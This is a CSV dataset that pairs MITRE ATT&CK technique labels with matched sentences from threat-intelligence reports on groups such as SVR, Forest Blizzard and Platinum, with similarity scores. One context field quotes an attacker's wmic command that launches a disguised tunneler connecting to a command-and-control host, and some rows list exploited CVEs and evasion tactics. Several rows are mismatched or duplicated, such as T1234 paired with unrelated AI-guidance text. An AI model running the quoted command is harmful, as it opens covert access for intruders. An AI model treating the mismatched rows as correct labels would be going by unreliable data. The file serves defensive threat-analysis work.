label_tec,original_phrase,before,matching_report_sentence,after,report_id,rank,cosine_score
T1234,engaging with artificial intelligence (ai)engaging with artificial intelligence (ai) 2contents introduction,"our mission is to make a positive contribution to alliance’s understanding of strategic communications and to facilitate accurate, appropriate, and timely communication among its members as objectives and roles emerge and evolve in the rapidly changing information environment. www.stratcomcoe.org | @stratcomcoe | info@stratcomcoe.org",engaging with artificial intelligence (ai)engaging with artificial intelligence (ai) 2contents introduction  .,. .,66f558c63063d29485700151,681,1.0000000000000002
T1234,engaging with artificial intelligence (ai)engaging with artificial intelligence (ai) 2contents introduction,"this publication was developed by the australian signals directorate’s australian cyber security centre (asd’s acsc) in collaboration with the following international partners: • united states (us) cybersecurity and infrastructure security agency (cisa), the federal bureau of investigation (fbi) and the national security agency (nsa) • united kingdom (uk) national cyber security centre (ncsc-uk) • canadian centre for cyber security (cccs) • new zealand national cyber security centre (ncsc-nz) and cert nz • germany federal office for information security (bsi) • israel national cyber directorate (incd) • japan national center of incident readiness and strategy for cybersecurity (nisc) and the secretariat of science, technology and innovation policy, cabinet office • norway national cyber security centre (ncsc-no) • singapore cyber security agency (csa) • sweden national cybersecurity center the guidance within this publication is focused on using ai systems securely rather than developing secure ai systems. the authoring agencies encourage developers of ai systems to refer to the joint guidelines for secure ai system development.",engaging with artificial intelligence (ai) 4what is ai?,"ai is the theory and development of computer systems able to perform tasks normally requiring human intelligence, such as visual perception, speech recognition, decision-making and translation between languages. modern ai is usually built using machine learning algorithms.",66f558c63063d29485700151,899,0.7199931386344736
T1234,engaging with artificial intelligence (ai)engaging with artificial intelligence (ai) 2contents introduction,"users tweeted abusive language at tay with the intention of inserting abusive material into tay’s training data therefore poisoning the ai model when it was retrained. as a result, tay began using abusive language towards other users.",engaging with artificial intelligence (ai) 62 .,input manipulation attacks – prompt injection and adversarial examples prompt injection is an input manipulation attack that attempts to insert malicious instructions or hidden commands into an ai system. prompt injection can allow a malicious actor to hijack the ai model’s output and jailbreak the ai system.,66f558c63063d29485700151,935,0.784560554423347
T1234,engaging with artificial intelligence (ai)engaging with artificial intelligence (ai) 2contents introduction,"the terms under which the coat of arms can be used are detailed on the department of the prime minister and cabinet website (www.pmc.gov.au/government/commonwealth-coat-arms). for more information, or to report a cyber security incident, contact us: cyber.gov.au | 1300 cyber1 (1300 292 371).",engaging with artificial intelligence (ai) 15,"ir-on-man: interpretable incident inspector based on large-scale language model and association mining sian-yao huang, cheng-lin yang, chung-kuan chen #bhusa @blackhateventsoutline research motivation research problem challenge 1: syntactic problem challenge 2: semantic problem challenge 3: contextual problem from cmdgpt to ir-on-man evaluation and real world experience conclusion #bhusa @blackhatevents$whoami sian-yao ‘eric’ huang senior data scientist at publication on top machine learning conferences cvpr ijcnn research focuses: large-scale multifactorial anomaly detection automatic ad security analysis massive user behavior retrieval cycraft | cycraft | twitter website #bhusa @blackhatevents$whoami cheng-lin ‘george’ yang, phd (twitter: @clyangtw) data science director at research focuses distributed large-scale cybersecurity ml analysis platform adopting large language model to the cybersecurity industry speakers at the following conference cybersec seccon pycon taiwan pycon japan amateur ctf player cycraft | cycraft | twitter website #bhusa @blackhatevents$whoami chung-kuan ‘ck’ chen, phd (twitter: @bletchley13) security research director at retired ctf player founder of bamboofox ctf team in nctu participate defcon final 2016 and 2018 chroot member - best private hacker group in taiwan director of association of hackers in taiwan(hit), chairman of hitcon editorial committee hitcon cmt 8/18~8/19 hitcon ent 11/15 hitcon ctf 9/8~9/10 cycraft | cycraft | twitter website #bhusa @blackhateventsendless fighting against threat actors taiwan is at the forefront of cyber threats. 台 we have closely monitored numerous cyber attacks, particularly those from china.",66f558c63063d29485700151,1097,0.8024374028092529
T1560,advstoreshell compresses output data generated by command execution with a custom implementation of the lempel–ziv–welch  algorithm.,"0 2 34 number entry 1 header entry 1 entry n header entry n of entries legend 0 4 8 12 28 32 plain text data lzw compressed data magic entry size command timestamp command return status number figure 18. outbound file format. field sizes are in bytes each entry begins with a 32-byte header, containing in particular a 4-byte magic number (0xb2745daf), the command return status code, a timestamp of the command execution (in a systemtime windows structure [19]), and the actual command number.","then comes the output data generated by the command execution, compressed with a custom implementation of the lempel–ziv–welch (lzw) algorithm [20].","73en route with sednit a source code search engine allowed us to retrieve what we believe to be the c source code of the lzw algorithm implementation employed by sedreco [21]. figure 19 shows an extract of the compressed data header initialization in the source code, with the distinctive lzw!",66f559433063d29485700167,1588,0.7481101096189448
T1562,adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.,"page 10 of 27 | product id: aa23-347a tlp:cleartlp:clear international partnership masquerading t1036 svr cyber actors use a variant that uses dll hijacking in zabbix as a means to start execution (and potentially provide long-term, hard-to- detect access) and a variant that masks itself within vcperf, an open- source c++ build analysis tool from microsoft. process injection t1055 svr cyber actors inject code into av and edr processes to evade defenses.",disable or modify tools t1562.001 svr cyber actors may modify and/or disable tools to avoid possible detection of their malware/tools and activities.,"hide artifacts t1564 svr cyber actors may attempt to hide artifacts associated with their behaviors to evade detection. hide artifacts: hidden files and t1564.001 when communicating with cloud directories services, graphicalproton generates a randomly named directory which is used to store infection-specific bmp files - with both commands and results.",66f559dc3063d29485700177,4633,0.7981759734806716
T1041,stolen data is encoded into the normal communications channel using the same protocol as command and control communications.,"table 11: svr cyber actors att&ck techniques for enterprise: exfiltration technique title id use automated exfiltration t1020 svr cyber actors may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during collection. page 13 of 27 | product id: aa23-347a tlp:cleartlp:clear international partnership exfiltration over c2 channel t1041 svr cyber actors may steal data by exfiltrating it over an existing c2 channel.",stolen data is encoded into normal communications using the same protocol as c2 communications.,exfiltration over web service t1567 svr cyber actors use onedrive and dropbox to exfiltrate data to their c2 station. indicators of compromise note: please refer to appendix b for a list of iocs.,66f559dc3063d29485700177,4651,0.8881032501438765
T1203,"the group has previously exploited cve-2017-8570, cve-2012-1856, cve-2014-4114, cve-2017-0199, cve-2017-11882, and cve-2015-1641.","forest blizzard delivered a customer backdoor called headlace by taking advantage of the israel-hamas war. it performed the attack campaign by exploiting a winrar flaw (cve-2023-38831), targeting critical infrastructure organizations across hungary, turkey, australia, poland, belgium, ukraine, germany, azerbaijan, saudi arabia, kazakhstan, italy, latvia, and romania.","forest blizzard demonstrates a history of leveraging various software weaknesses across a wide range of years, from 2010 to 2023. the most exploited vulnerabilities by forest blizzard have been tracked as follows: cve-2017-0144, cve-2013-3897, cve-2014-1776, cve-2012-0158, cve-2015-5119, cve-2013-3906, cve-2015-7645, cve-2015-2387, cve-2010-3333, cve-2015-1641, cve-2013-1347, cve-2015-3043, cve-2015-1642, cve-2015-2590, cve-2015-1701, cve-2015-4902, cve-2017-0262, cve-2017-6742 , cve-2017-0263, cve-2014-4076, cve-2014-0515, cve-2022-30190, cve-2021-34527, cve-2021-1675, cve-2022-38028, cve-2023-23397, cve-2023-38831 www.logpoint.com 06malware timeline malware timeline forest blizzard is notorious for using custom malware, unlike some adversaries who use off-the-shelf tools.","2011-2012  sofacy (sourface): first-stage malware implant used by forest blizzard tailors their malware for specific use forest blizzard, sharing similarities with the older miniduke implants. cases.",66f559ad3063d2948570016b,2389,0.7359624496859996
T1203,"hafnium has exploited cve-2021-26855, cve-2021-26857, cve-2021-26858, and cve-2021-27065  to compromise on-premises versions of microsoft exchange server, enabling access to email accounts and installation of additional malware.","]com and openmd5 . ]com ) reported by mstic and plugx c2 infrastructure, ip address 137.220.178 . 43 .","we observed this c2 targeting mail servers in early to mid-2021, with this activity likely tied to the exploitation of 4 microsoft exchange server vulnerabilities  cve 2021 26855, cve 2021 26857, cve 2021 26858, cve 2021 27065  released in march 2021. these domains also have hosting overlaps with ip addresses observed within the identified ddns cluster.",11 cta cn 2023 0330 recordedfuture®|www.recordedfuture.comcyberthreatanalysis|china mitigations a previous insikt group report provides a comprehensive breakdown of detection and mitigation techniques related to cobalt strike. recorded future proactively detects both cobalt strike and plugx servers and are logged in the command and control security control feed.,66f559e03063d29485700178,4803,0.7218382363666338
T1068,"apt28 has exploited cve-2014-4076, cve-2015-2387, cve-2015-1701, cve-2017-0263 to escalate privileges.","forest blizzard delivered a customer backdoor called headlace by taking advantage of the israel-hamas war. it performed the attack campaign by exploiting a winrar flaw (cve-2023-38831), targeting critical infrastructure organizations across hungary, turkey, australia, poland, belgium, ukraine, germany, azerbaijan, saudi arabia, kazakhstan, italy, latvia, and romania.","forest blizzard demonstrates a history of leveraging various software weaknesses across a wide range of years, from 2010 to 2023. the most exploited vulnerabilities by forest blizzard have been tracked as follows: cve-2017-0144, cve-2013-3897, cve-2014-1776, cve-2012-0158, cve-2015-5119, cve-2013-3906, cve-2015-7645, cve-2015-2387, cve-2010-3333, cve-2015-1641, cve-2013-1347, cve-2015-3043, cve-2015-1642, cve-2015-2590, cve-2015-1701, cve-2015-4902, cve-2017-0262, cve-2017-6742 , cve-2017-0263, cve-2014-4076, cve-2014-0515, cve-2022-30190, cve-2021-34527, cve-2021-1675, cve-2022-38028, cve-2023-23397, cve-2023-38831 www.logpoint.com 06malware timeline malware timeline forest blizzard is notorious for using custom malware, unlike some adversaries who use off-the-shelf tools.","2011-2012  sofacy (sourface): first-stage malware implant used by forest blizzard tailors their malware for specific use forest blizzard, sharing similarities with the older miniduke implants. cases.",66f559ad3063d2948570016b,2389,0.7519177030093914
T1083,"geminiduke collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's my documents, programs installed to the program files folder, and recently accessed files, folders, and programs.","the length of the data section name must be 4 bytes!” geminiduke first known activity january 2009 most recent known activity december 2012 other names n/a c&c communication methods http (s) known toolset components ◊ loader ◊ information stealer ◊ multiple persistence components the geminiduke toolset consists of a core information stealer, a loader and multiple persistence- related components. unlike cosmicduke and pinchduke, geminiduke primarily collects information on the victim computer’s configuration.","the collected details include: • local user accounts • network settings • internet proxy settings • installed drivers • running processes • programs previously executed by users • programs and services configured to automatically run at startup • values of environment variables • files and folders present in any users home folder • files and folders present in any users my documents • programs installed to the program files folder • recently accessed files, folders and programs f-secure whitepaper, september 2015 23as is common for malware, the geminiduke infostealer uses a mutex to ensure that only one instance of itself is running at a time.",what is less common is that the name used for the mutex is often a timestamp. we believe these timestamps to be generated during the compilation of geminiduke from the local time of the computer being used.,66f559d83063d29485700176,4360,0.7836515261902968
T1564,adversaries may attempt to hide artifacts associated with their behaviors to evade detection.,process injection t1055 svr cyber actors inject code into av and edr processes to evade defenses. disable or modify tools t1562.001 svr cyber actors may modify and/or disable tools to avoid possible detection of their malware/tools and activities.,hide artifacts t1564 svr cyber actors may attempt to hide artifacts associated with their behaviors to evade detection.,"hide artifacts: hidden files and t1564.001 when communicating with cloud directories services, graphicalproton generates a randomly named directory which is used to store infection-specific bmp files - with both commands and results. table 7: svr cyber actors’ att&ck techniques for enterprise: credential access technique title id use os credential dumping: lsass t1003.001 svr cyber actors executed mimikatz memory commands in memory to gain access to credentials stored in memory.",66f559dc3063d29485700177,4634,0.8012112907580574
T1572,adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems.,"page 12 of 27 | product id: aa23-347a tlp:cleartlp:clear international partnership windows management t1047 svr cyber actors executed instrumentation rsockstun either in memory or using windows management instrumentation (wmi) to execute malicious commands and payloads. wmic process call create ""c:\\\\program files\\\\windows defender advanced threat protection\\\\sense.exe -connect poetpages.com -pass m554- 0sddsf2@34232fsl45t31"" table 10: svr cyber actors att&ck techniques for enterprise: command and control technique title id use dynamic resolution t1568 svr may dynamically establish connections to command-and-control infrastructure to evade common detections and remediations.",protocol tunneling t1572 svr cyber actors may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems.,"in selected environments, the svr used an additional tool named, “rr.exe”—a modified open source reverse socks tunneler named rsockstunm—to establish a tunnel to the c2 infrastructure. table 11: svr cyber actors att&ck techniques for enterprise: exfiltration technique title id use automated exfiltration t1020 svr cyber actors may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during collection.",66f559dc3063d29485700177,4647,0.8463498886297561
T1592,adversaries may gather information about the victim's host software that can be used during targeting.,"for additional mitigations, see the mitigations section. table 1: svr cyber actors att&ck techniques for enterprise - reconnaissance technique title id use gather victim network svr cyber actors may gather t1046 information: network topology information about the victim’s network topology that can be used during targeting.",gather victim host information: t1592.002 svr cyber actors may gather software information about the victim’s host networks that can be used during targeting.,page 8 o f 27 | product id: aa23-347a tlp:cleartlp:clear international partnership table 2: svr cyber actors’ att&ck techniques for enterprise – initial access technique title id use exploit public-facing application t1190 svr cyber actors exploit internet- connected jetbrains teamcity server using cve-2023-42793 for initial access. table 3: svr cyber actors’ att&ck techniques for enterprise: execution techniqu id use e title comman t1059.0 svr cyber actors used powershell commands to compress microsoft sql d and 01 server .dll files.,66f559dc3063d29485700177,4620,0.715508447850562
T1562,adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.,"page 10 of 27 | product id: aa23-347a tlp:cleartlp:clear international partnership masquerading t1036 svr cyber actors use a variant that uses dll hijacking in zabbix as a means to start execution (and potentially provide long-term, hard-to- detect access) and a variant that masks itself within vcperf, an open- source c++ build analysis tool from microsoft. process injection t1055 svr cyber actors inject code into av and edr processes to evade defenses.",disable or modify tools t1562.001 svr cyber actors may modify and/or disable tools to avoid possible detection of their malware/tools and activities.,"hide artifacts t1564 svr cyber actors may attempt to hide artifacts associated with their behaviors to evade detection. hide artifacts: hidden files and t1564.001 when communicating with cloud directories services, graphicalproton generates a randomly named directory which is used to store infection-specific bmp files - with both commands and results.",66f559dc3063d29485700177,4633,0.7981759734806716
T1564,adversaries may attempt to hide artifacts associated with their behaviors to evade detection.,process injection t1055 svr cyber actors inject code into av and edr processes to evade defenses. disable or modify tools t1562.001 svr cyber actors may modify and/or disable tools to avoid possible detection of their malware/tools and activities.,hide artifacts t1564 svr cyber actors may attempt to hide artifacts associated with their behaviors to evade detection.,"hide artifacts: hidden files and t1564.001 when communicating with cloud directories services, graphicalproton generates a randomly named directory which is used to store infection-specific bmp files - with both commands and results. table 7: svr cyber actors’ att&ck techniques for enterprise: credential access technique title id use os credential dumping: lsass t1003.001 svr cyber actors executed mimikatz memory commands in memory to gain access to credentials stored in memory.",66f559dc3063d29485700177,4634,0.8012112907580574
T1203,they have also used zero-day exploits.,"who is blind eagle? blind eagle (aka apt-c-36) is a suspected south america espionage group that has been active since at least 2018. the group is known for using a variety of sophisticated attack techniques, including custom malware, social engineering tactics, and spear-phishing attacks.",they have also been observed using exploits for zero-day vulnerabilities in their attacks.,"3apt blind eagle’s malware arsenal: technical analysis of the new attack chain first stage: javascript downloader in the first stage, a javascript downloader is used. the code below which is written in javascript uses activexobject to run powershell commands.",66f55a4d3063d29485700182,3986,0.7196413267616588
T1203,they have also used zero-day exploits.,"who is blind eagle? blind eagle (aka apt-c-36) is a suspected south america espionage group that has been active since at least 2018. the group is known for using a variety of sophisticated attack techniques, including custom malware, social engineering tactics, and spear-phishing attacks.",they have also been observed using exploits for zero-day vulnerabilities in their attacks.,"3apt blind eagle’s malware arsenal: technical analysis of the new attack chain first stage: javascript downloader in the first stage, a javascript downloader is used. the code below which is written in javascript uses activexobject to run powershell commands.",66f55a4d3063d29485700182,3986,0.7196413267616588
T1203,they have also used zero-day exploits.,"the different backdoors written by or for the group indicate a considerable investment over time. research indicates that platinum has used multiple backdoors concurrently at times, which could represent either multiple teams within the activity group performing different campaigns, or different versions of the tools being used against varying victim networks.",• zero day exploits.,"platinum has used several zero-day exploits against their victims. regardless of whether they researched the exploits themselves or purchased them from independent researchers, the monetary investment required to collect and deploy zero-day exploits at this level is considerable.",66f55a9e3063d29485700197,3452,0.8152144330550952
T1083,jpin can enumerate drives and their types.,"after it is installed and started, the jpin service can perform the following tasks, among others: • obtain information about the computer, such as operating system version, user name, privileges, disk space, and so on. • list running services, processes, job ids, and task ids.",• enumerate drives and their types.,• enumerate registry keys. • load a custom keylogger.,66f55a9e3063d29485700197,3379,0.8271897007149128
T1083,it can also change file permissions using cacls.exe.,"• inject content into the lsass.exe process, in order to load the keylogger module into lsass and call its exported function.• communicate via ftp. • send email via smtp.",• change permissions on files using the cacls.exe command-line utility.,"jpin can also target mobile suite applications and extract data from them. the backdoor contains code that looks for installed instances of symbian, blackberry, and windows phone management applications.",66f55a9e3063d29485700197,3389,0.7077440610256507
T1105,jpin can download files and upgrade itself.,• load a custom keylogger. • download files.,• download and upgrade itself.,"• acquire network information such as dns, ip, proxies, and so on. • exfiltrate information over http get and post requests, with the data stored either within the http body or within the url parameters.",66f55a9e3063d29485700197,3383,0.7920700869235389
T1071,jpin can send email over smtp.,"• lower security settings by tampering with registry keys. • inject content into the lsass.exe process, in order to load the keylogger module into lsass and call its exported function.• communicate via ftp.",• send email via smtp.,• change permissions on files using the cacls.exe command-line utility. jpin can also target mobile suite applications and extract data from them.,66f55a9e3063d29485700197,3388,0.7072174568759437
T1012,advstoreshell can enumerate registry keys.,"• list running services, processes, job ids, and task ids. • enumerate drives and their types.",• enumerate registry keys.,• load a custom keylogger. • download files.,66f55a9e3063d29485700197,3380,0.7411477090749925
T1012,jpin can enumerate registry keys.,"• list running services, processes, job ids, and task ids. • enumerate drives and their types.",• enumerate registry keys.,• load a custom keylogger. • download files.,66f55a9e3063d29485700197,3380,0.751449817329315
T1049,carbon uses the netstat -r and netstat -an commands.,(accessed:02.02.2021). [3] microsoft.,netstat.,url : https://docs.microsoft.com/en-us/windows-server/ administration/windows-commands/netstat.(accessed:02.02.2021). [4] microsoft.,66f55a893063d29485700192,2727,0.7927614595882142
